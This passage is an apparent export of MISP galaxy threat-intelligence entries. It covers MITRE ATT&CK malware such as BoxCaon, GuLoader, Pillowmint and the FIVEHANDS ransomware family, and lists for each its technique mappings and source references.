uses: misp-galaxy:mitre-attack-pattern="Masquerading - T1036" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Proxy - T1090" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Service Discovery - T1007" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"

Table 4894. Table References
Links
https://attack.mitre.org/software/S0615
https://blogs.blackberry.com/en/2020/11/the-costaricto-campaign-cyber-espionage-outsourced
https://www.fireeye.com/blog/threat-research/2021/04/unc2447-sombrat-and-fivehands-ransomware-sophisticated-financial-threat.html
https://us-cert.cisa.gov/ncas/analysis-reports/ar21-126a

BoxCaon - S0651

[BoxCaon](https://attack.mitre.org/software/S0651) is a Windows backdoor that was used by [IndigoZebra](https://attack.mitre.org/groups/G0136) in a 2021 spearphishing campaign against Afghan government officials. [BoxCaon](https://attack.mitre.org/software/S0651)'s name stems from similarities shared with the malware family [xCaon](https://attack.mitre.org/software/S0653).(Citation: Checkpoint IndigoZebra July 2021)

The tag is: misp-galaxy:mitre-malware="BoxCaon - S0651"

BoxCaon - S0651 is also known as:

BoxCaon

View relationships graph

BoxCaon - S0651 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Boot or Logon Autostart Execution - T1547" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exfiltration to Cloud Storage - T1567.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Local Data Staging - T1074.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Bidirectional Communication - T1102.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exfiltration Over C2 Channel - T1041" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Native API - T1106" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"

Table 4895. Table References
Links
https://attack.mitre.org/software/S0651
https://research.checkpoint.com/2021/indigozebra-apt-continues-to-attack-central-asia-with-evolving-tools/
https://thehackernews.com/2021/07/indigozebra-apt-hacking-campaign.html

SoreFang - S0516

[SoreFang](https://attack.mitre.org/software/S0516) is first stage downloader used by [APT29](https://attack.mitre.org/groups/G0016) for exfiltration and to load other malware.(Citation: NCSC APT29 July 2020)(Citation: CISA SoreFang July 2016)

The tag is: misp-galaxy:mitre-malware="SoreFang - S0516"

SoreFang - S0516 is also known as:

SoreFang

View relationships graph

SoreFang - S0516 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exploit Public-Facing Application - T1190" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Domain Groups - T1069.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Local Account - T1087.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Domain Account - T1087.002" with estimative-language:likelihood-probability="almost-certain"

Table 4896. Table References
Links
https://attack.mitre.org/software/S0516
https://www.ncsc.gov.uk/files/Advisory-APT29-targets-COVID-19-vaccine-development-V1-1.pdf
https://us-cert.cisa.gov/ncas/analysis-reports/ar20-198a

KOMPROGO - S0156

[KOMPROGO](https://attack.mitre.org/software/S0156) is a signature backdoor used by [APT32](https://attack.mitre.org/groups/G0050) that is capable of process, file, and registry management. (Citation: FireEye APT32 May 2017)

The tag is: misp-galaxy:mitre-malware="KOMPROGO - S0156"

KOMPROGO - S0156 is also known as:

KOMPROGO

View relationships graph

KOMPROGO - S0156 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"

Table 4897. Table References
Links
https://attack.mitre.org/software/S0156
https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html

GuLoader - S0561

[GuLoader](https://attack.mitre.org/software/S0561) is a file downloader that has been used since at least December 2019 to distribute a variety of remote administration tool (RAT) malware, including [NETWIRE](https://attack.mitre.org/software/S0198), [Agent Tesla](https://attack.mitre.org/software/S0331), [NanoCore](https://attack.mitre.org/software/S0336), FormBook, and Parallax RAT.(Citation: Unit 42 NETWIRE April 2020)(Citation: Medium Eli Salem GuLoader April 2021)

The tag is: misp-galaxy:mitre-malware="GuLoader - S0561"

GuLoader - S0561 is also known as:

GuLoader

View relationships graph

GuLoader - S0561 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Spearphishing Link - T1566.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Malicious Link - T1204.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Injection - T1055" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Checks - T1497.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Time Based Evasion - T1497.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Native API - T1106" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Service - T1102" with estimative-language:likelihood-probability="almost-certain"

Table 4898. Table References
Links
https://attack.mitre.org/software/S0561
https://unit42.paloaltonetworks.com/guloader-installing-netwire-rat/
https://elis531989.medium.com/dancing-with-shellcodes-cracking-the-latest-version-of-guloader-75083fb15cb4

OSInfo - S0165

[OSInfo](https://attack.mitre.org/software/S0165) is a custom tool used by [APT3](https://attack.mitre.org/groups/G0022) to do internal discovery on a victim’s computer and network. (Citation: Symantec Buckeye)

The tag is: misp-galaxy:mitre-malware="OSInfo - S0165"

OSInfo - S0165 is also known as:

OSInfo

View relationships graph

OSInfo - S0165 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="System Network Connections Discovery - T1049" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Domain Account - T1087.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Local Groups - T1069.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Network Share Discovery - T1135" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Query Registry - T1012" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Remote System Discovery - T1018" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Local Account - T1087.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Domain Groups - T1069.002" with estimative-language:likelihood-probability="almost-certain"

Table 4899. Table References
Links
https://attack.mitre.org/software/S0165
http://www.symantec.com/connect/blogs/buckeye-cyberespionage-group-shifts-gaze-us-hong-kong

SOUNDBITE - S0157

[SOUNDBITE](https://attack.mitre.org/software/S0157) is a signature backdoor used by [APT32](https://attack.mitre.org/groups/G0050). (Citation: FireEye APT32 May 2017)

The tag is: misp-galaxy:mitre-malware="SOUNDBITE - S0157"

SOUNDBITE - S0157 is also known as:

SOUNDBITE

View relationships graph

SOUNDBITE - S0157 has relationships with:

similar: misp-galaxy:malpedia="SOUNDBITE" with estimative-language:likelihood-probability="likely"
uses: misp-galaxy:mitre-attack-pattern="DNS - T1071.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Application Window Discovery - T1010" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"

Table 4900. Table References
Links
https://attack.mitre.org/software/S0157
https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html

Pillowmint - S0517

[Pillowmint](https://attack.mitre.org/software/S0517) is a point-of-sale malware used by [FIN7](https://attack.mitre.org/groups/G0046) designed to capture credit card information.(Citation: Trustwave Pillowmint June 2020)

The tag is: misp-galaxy:mitre-malware="Pillowmint - S0517"

Pillowmint - S0517 is also known as:

Pillowmint

View relationships graph

Pillowmint - S0517 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Archive Collected Data - T1560" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Native API - T1106" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Application Shimming - T1546.011" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Asynchronous Procedure Call - T1055.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Indicator Removal on Host - T1070" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Query Registry - T1012" with estimative-language:likelihood-probability="almost-certain"

Table 4901. Table References
Links
https://attack.mitre.org/software/S0517
https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/pillowmint-fin7s-monkey-thief/

SEASHARPEE - S0185

[SEASHARPEE](https://attack.mitre.org/software/S0185) is a Web shell that has been used by [OilRig](https://attack.mitre.org/groups/G0049). (Citation: FireEye APT34 Webinar Dec 2017)

The tag is: misp-galaxy:mitre-malware="SEASHARPEE - S0185"

SEASHARPEE - S0185 is also known as:

SEASHARPEE

View relationships graph

SEASHARPEE - S0185 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Shell - T1505.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Timestomp - T1070.006" with estimative-language:likelihood-probability="almost-certain"

Table 4902. Table References
Links
https://attack.mitre.org/software/S0185
https://www.brighttalk.com/webcast/10703/296317/apt34-new-targeted-attack-in-the-middle-east

PHOREAL - S0158

[PHOREAL](https://attack.mitre.org/software/S0158) is a signature backdoor used by [APT32](https://attack.mitre.org/groups/G0050). (Citation: FireEye APT32 May 2017)

The tag is: misp-galaxy:mitre-malware="PHOREAL - S0158"

PHOREAL - S0158 is also known as:

PHOREAL

View relationships graph

PHOREAL - S0158 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Non-Application Layer Protocol - T1095" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Custom Command and Control Protocol - T1094" with estimative-language:likelihood-probability="almost-certain"

Table 4903. Table References
Links
https://attack.mitre.org/software/S0158
https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html

PolyglotDuke - S0518

[PolyglotDuke](https://attack.mitre.org/software/S0518) is a downloader that has been used by [APT29](https://attack.mitre.org/groups/G0016) since at least 2013. [PolyglotDuke](https://attack.mitre.org/software/S0518) has been used to drop [MiniDuke](https://attack.mitre.org/software/S0051).(Citation: ESET Dukes October 2019)

The tag is: misp-galaxy:mitre-malware="PolyglotDuke - S0518"

PolyglotDuke - S0518 is also known as:

PolyglotDuke

View relationships graph

PolyglotDuke - S0518 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Steganography - T1027.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Dead Drop Resolver - T1102.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Native API - T1106" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Rundll32 - T1218.011" with estimative-language:likelihood-probability="almost-certain"

Table 4904. Table References
Links
https://attack.mitre.org/software/S0518
https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Operation_Ghost_Dukes.pdf

SNUGRIDE - S0159

[SNUGRIDE](https://attack.mitre.org/software/S0159) is a backdoor that has been used by [menuPass](https://attack.mitre.org/groups/G0045) as first stage malware. (Citation: FireEye APT10 April 2017)

The tag is: misp-galaxy:mitre-malware="SNUGRIDE - S0159"

SNUGRIDE - S0159 is also known as:

SNUGRIDE

View relationships graph

SNUGRIDE - S0159 has relationships with:

similar: misp-galaxy:tool="SNUGRIDE" with estimative-language:likelihood-probability="likely"
uses: misp-galaxy:mitre-attack-pattern="Symmetric Cryptography - T1573.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"

Table 4905. Table References
Links
https://attack.mitre.org/software/S0159
https://www.fireeye.com/blog/threat-research/2017/04/apt10_menupass_grou.html

DEATHRANSOM - S0616

[DEATHRANSOM](https://attack.mitre.org/software/S0616) is ransomware written in C that has been used since at least 2020, and has potential overlap with [FIVEHANDS](https://attack.mitre.org/software/S0618) and [HELLOKITTY](https://attack.mitre.org/software/S0617).(Citation: FireEye FiveHands April 2021)

The tag is: misp-galaxy:mitre-malware="DEATHRANSOM - S0616"

DEATHRANSOM - S0616 is also known as:

DEATHRANSOM

View relationships graph

DEATHRANSOM - S0616 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Network Share Discovery - T1135" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Inhibit System Recovery - T1490" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data Encrypted for Impact - T1486" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Language Discovery - T1614.001" with estimative-language:likelihood-probability="almost-certain"

Table 4906. Table References
Links
https://attack.mitre.org/software/S0616
https://www.fireeye.com/blog/threat-research/2021/04/unc2447-sombrat-and-fivehands-ransomware-sophisticated-financial-threat.html

RemoteCMD - S0166

[RemoteCMD](https://attack.mitre.org/software/S0166) is a custom tool used by [APT3](https://attack.mitre.org/groups/G0022) to execute commands on a remote system similar to SysInternal’s PSEXEC functionality. (Citation: Symantec Buckeye)

The tag is: misp-galaxy:mitre-malware="RemoteCMD - S0166"

RemoteCMD - S0166 is also known as:

RemoteCMD

View relationships graph

RemoteCMD - S0166 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Service Execution - T1569.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

Table 4907. Table References
Links
https://attack.mitre.org/software/S0166
http://www.symantec.com/connect/blogs/buckeye-cyberespionage-group-shifts-gaze-us-hong-kong

HELLOKITTY - S0617

[HELLOKITTY](https://attack.mitre.org/software/S0617) is a ransomware written in C++ that shares similar code structure and functionality with [DEATHRANSOM](https://attack.mitre.org/software/S0616) and [FIVEHANDS](https://attack.mitre.org/software/S0618). [HELLOKITTY](https://attack.mitre.org/software/S0617) has been used since at least 2020, targets have included a Polish video game developer and a Brazilian electric power company.(Citation: FireEye FiveHands April 2021)

The tag is: misp-galaxy:mitre-malware="HELLOKITTY - S0617"

HELLOKITTY - S0617 is also known as:

HELLOKITTY

View relationships graph

HELLOKITTY - S0617 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Network Share Discovery - T1135" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Inhibit System Recovery - T1490" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data Encrypted for Impact - T1486" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"

Table 4908. Table References
Links
https://attack.mitre.org/software/S0617
https://www.fireeye.com/blog/threat-research/2021/04/unc2447-sombrat-and-fivehands-ransomware-sophisticated-financial-threat.html

Matryoshka - S0167

[Matryoshka](https://attack.mitre.org/software/S0167) is a malware framework used by [CopyKittens](https://attack.mitre.org/groups/G0052) that consists of a dropper, loader, and RAT. It has multiple versions; v1 was seen in the wild from July 2016 until January 2017. v2 has fewer commands and other minor differences. (Citation: ClearSky Wilted Tulip July 2017) (Citation: CopyKittens Nov 2015)

The tag is: misp-galaxy:mitre-malware="Matryoshka - S0167"

Matryoshka - S0167 is also known as:

Matryoshka

View relationships graph

Matryoshka - S0167 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Rundll32 - T1218.011" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1113" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Credentials from Password Stores - T1555" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Dynamic-link Library Injection - T1055.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="DNS - T1071.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"

Table 4909. Table References
Links
https://attack.mitre.org/software/S0167
http://www.clearskysec.com/wp-content/uploads/2017/07/Operation_Wilted_Tulip.pdf
https://s3-eu-west-1.amazonaws.com/minervaresearchpublic/CopyKittens/CopyKittens.pdf

Wingbird - S0176

[Wingbird](https://attack.mitre.org/software/S0176) is a backdoor that appears to be a version of commercial software [FinFisher](https://attack.mitre.org/software/S0182). It is reportedly used to attack individual computers instead of networks. It was used by [NEODYMIUM](https://attack.mitre.org/groups/G0055) in a May 2016 campaign. (Citation: Microsoft SIR Vol 21) (Citation: Microsoft NEODYMIUM Dec 2016)

The tag is: misp-galaxy:mitre-malware="Wingbird - S0176"

Wingbird - S0176 is also known as:

Wingbird

View relationships graph

Wingbird - S0176 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Security Software Discovery - T1518.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exploitation for Privilege Escalation - T1068" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="LSASS Driver - T1547.008" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Injection - T1055" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1574.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Service Execution - T1569.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"

Table 4910. Table References
Links
https://attack.mitre.org/software/S0176
http://download.microsoft.com/download/E/B/0/EB0F50CC-989C-4B66-B7F6-68CD3DC90DE3/Microsoft_Security_Intelligence_Report_Volume_21_English.pdf
https://blogs.technet.microsoft.com/mmpc/2016/12/14/twin-zero-day-attacks-promethium-and-neodymium-target-individuals-in-europe/
https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Backdoor:Win32/Wingbird.A!dha

FIVEHANDS - S0618

[FIVEHANDS](https://attack.mitre.org/software/S0618) is a customized version of [DEATHRANSOM](https://attack.mitre.org/software/S0616) ransomware written in C++. [FIVEHANDS](https://attack.mitre.org/software/S0618) has been used since at least 2021, including in Ransomware-as-a-Service (RaaS) campaigns, sometimes along with [SombRAT](https://attack.mitre.org/software/S0615).(Citation: FireEye FiveHands April 2021)(Citation: NCC Group Fivehands June 2021)

The tag is: misp-galaxy:mitre-malware="FIVEHANDS - S0618"

FIVEHANDS - S0618 is also known as:

FIVEHANDS

View relationships graph

FIVEHANDS - S0618 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Inhibit System Recovery - T1490" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data Encrypted for Impact - T1486" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Network Share Discovery - T1135" with estimative-language:likelihood-probability="almost-certain"

Table 4911. Table References
Links
https://attack.mitre.org/software/S0618
https://www.fireeye.com/blog/threat-research/2021/04/unc2447-sombrat-and-fivehands-ransomware-sophisticated-financial-threat.html
https://research.nccgroup.com/2021/06/15/handy-guide-to-a-new-fivehands-ransomware-variant/

DownPaper - S0186

[DownPaper](https://attack.mitre.org/software/S0186) is a backdoor Trojan; its main functionality is to download and run second stage malware. (Citation: ClearSky Charming Kitten Dec 2017)

The tag is: misp-galaxy:mitre-malware="DownPaper - S0186"

DownPaper - S0186 is also known as:

DownPaper

View relationships graph

DownPaper - S0186 has relationships with:

similar: misp-galaxy:malpedia="DownPaper" with estimative-language:likelihood-probability="likely"
uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Query Registry - T1012" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"

Table 4912. Table References
Links
https://attack.mitre.org/software/S0186
http://www.clearskysec.com/wp-content/uploads/2017/12/Charming_Kitten_2017.pdf

Gazer - S0168

[Gazer](https://attack.mitre.org/software/S0168) is a backdoor used by [Turla](https://attack.mitre.org/groups/G0010) since at least 2016. (Citation: ESET Gazer Aug 2017)

The tag is: misp-galaxy:mitre-malware="Gazer - S0168"

Gazer - S0168 is also known as:

Gazer
WhiteBear

View relationships graph

Gazer - S0168 has relationships with:

similar: misp-galaxy:malpedia="Gazer" with estimative-language:likelihood-probability="likely"
uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Winlogon Helper DLL - T1547.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Thread Execution Hijacking - T1055.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Timestomp - T1070.006" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Screensaver - T1546.002" with estimative-language:likelihood-probability="almost-certain"
